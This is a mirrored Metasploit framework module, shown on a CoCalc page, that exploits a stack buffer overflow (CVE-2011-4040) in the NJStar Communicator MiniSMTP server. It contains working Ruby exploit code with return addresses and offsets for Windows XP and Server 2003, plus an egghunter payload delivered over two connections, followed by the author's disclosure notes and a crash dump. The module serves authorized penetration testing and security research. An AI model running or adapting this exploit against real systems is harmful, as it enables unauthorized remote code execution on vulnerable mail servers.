Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/njstar_smtp_bof.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow vulnerability in NJStar Communicator

19
          Version 3.00 MiniSMTP server.  The MiniSMTP application can be seen in multiple

20
          NJStar products, and will continue to run in the background even if the

21
          software is already shutdown.  According to the vendor's testimonials,

22
          NJStar software is also used by well known companies such as Siemens, NEC,

23
          Google, Yahoo, eBay; government agencies such as the FBI, Department of

24
          Justice (HK); as well as a long list of universities such as Yale, Harvard,

25
          University of Tokyo, etc.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Dillon Beresford', # Original discovery and MSF Module.

30
        ],

31
        'References' => [

32
          [ 'OSVDB', '76728' ],

33
          [ 'CVE', '2011-4040' ],

34
          [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],

35
          [ 'EDB', '18057' ]

36
        ],

37
        'DefaultOptions' => {

38
          'EXITFUNC' => 'thread',

39
        },

40
        'Platform' => 'win',

41
        'Payload' => {

42
          'BadChars' => "\x00",

43
          'StackAdjustment' => -1500,

44
        },

45
        'Targets' => [

46
          [

47
            'Windows XP SP2/SP3',

48
            {

49
              'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)

50
              'Offset' => 247,

51
            }

52
          ],

53
          [

54
            # Can't test patch level on this one, because you can't

55
            # even update Win2k3 SP0 anymore from Windows Update

56
            'Windows Server 2003 SP0',

57
            {

58
              'Ret' => 0x77d20738, # JMP ESP (USER32.dll)

59
              'Offset' => 247,

60
            }

61
          ],

62
          [

63
            'Windows Server 2003 SP1/SP2',

64
            {

65
              'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)

66
              'Offset' => 247,

67
            }

68
          ]

69
        ],

70
        'Privileged' => false,

71
        'DisclosureDate' => '2011-10-31',

72
        'DefaultTarget' => 0,

73
        'Notes' => {

74
          'Reliability' => UNKNOWN_RELIABILITY,

75
          'Stability' => UNKNOWN_STABILITY,

76
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

77
        }

78
      )

79
    )

80


81
    register_options([Opt::RPORT(25)])

82
  end

83


84
  def check

85
    connect

86
    # We get a response like: "220 [host-name] Service Ready"

87
    # But we don't really care about this one

88
    res = sock.get_once(-1, 5)

89
    vprint_status("Banner: #{res.to_s.chop}")

90


91
    sock.puts("HELP\r\n")

92


93
    # But the HELP response will tell us if this is a NJStar SMTP or not

94
    res = sock.get_once(-1, 5)

95
    vprint_status("HELP Response: #{res.to_s.chop}")

96
    disconnect

97


98
    # I can only flag it as "Detected" because it doesn't return a version

99
    if res =~ /Windows E-mail Server From NJStar Software/i

100
      return Exploit::CheckCode::Detected

101
    end

102


103
    return Exploit::CheckCode::Safe

104
  end

105


106
  def exploit

107
    eggoptions =

108
      {

109
        :checksum => true,

110
        :eggtag => "w00t"

111
      }

112


113
    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

114


115
    buffer = rand_text(target['Offset'])

116
    buffer << [target.ret].pack('V')

117
    buffer << hunter

118
    buffer << make_nops(4)

119


120
    # Just some debugging output so we can see lengths and byte size of each of our buffer.

121
    vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))

122
    vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))

123
    vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))

124


125
    print_status("Trying target #{target.name}...")

126


127
    # har har har you get trick no treat...

128
    # we dont have very much space so we

129
    # send our egg in a seperate connection

130
    connect

131


132
    print_status("Sending the egg...")

133
    sock.put(egg)

134


135
    # I think you betta call, ghostbusters...

136
    # now we send our evil buffer along with the

137
    # egg hunter, we are doing multiple connections

138
    # to solve the issue with limited stack space.

139
    # thanks to bannedit for advice on threads and

140
    # making multiple connections to get around

141
    # stack space constraints. :)

142
    connect

143


144
    print_status("Sending our buffer containing the egg hunter...")

145
    sock.put(buffer)

146


147
    handler

148
    disconnect

149
  end

150
end

151


152
=begin

153
Dillon Beresford

154
https://twitter.com/#!/D1N

155


156
NJStar Communicator

157
Version: 3.00 and prior

158
Build: 11818 and prior

159


160
Tested minismtp version:

161
1.30.0.60218

162


163
Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,

164
manils, d0tslash, mublix, halsten, and everyone at AHA!

165


166
No response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded

167
on 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability

168
is remotely exploitable and needed more verification. I sent a proof of concept exploit

169
in python with remote code execution. So, here is the proof that the bug is, in fact,

170
remotely exploitable. WIN!

171


172
System DLLs are used for target.ret because minismtp.exe is the only NJStar component in

173
memory, and its base starts with a 0x00, that's no good.  However, if your target machine

174
started minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator

175
-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is

176
ideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).

177


178
eax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50

179
edi=008a3d80

180
eip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0          nv up ei pl nz na pe nc

181
cs=001b	 ss=0023  ds=0023  es=0023	fs=003b	 gs=0000

182
efl=00010206

183
42424242 ??     ???

184
0:003> !exchain

185
image00400000+bbc4 (0040bbc4)

186
00ccff00: 41414141

187
Invalid exception stack at 41414141

188
0:003> d esp

189
00ccff70  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

190
00ccff80  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

191
00ccff90  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

192
00ccffa0  44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00  DDDD......@. #A.

193
00ccffb0  00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00  ........)..|.=..

194
00ccffc0  00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f  .........=......

195
00ccffd0  00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff  ................

196
00ccffe0  d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00  ...|0..|........

197


198
=end

199


200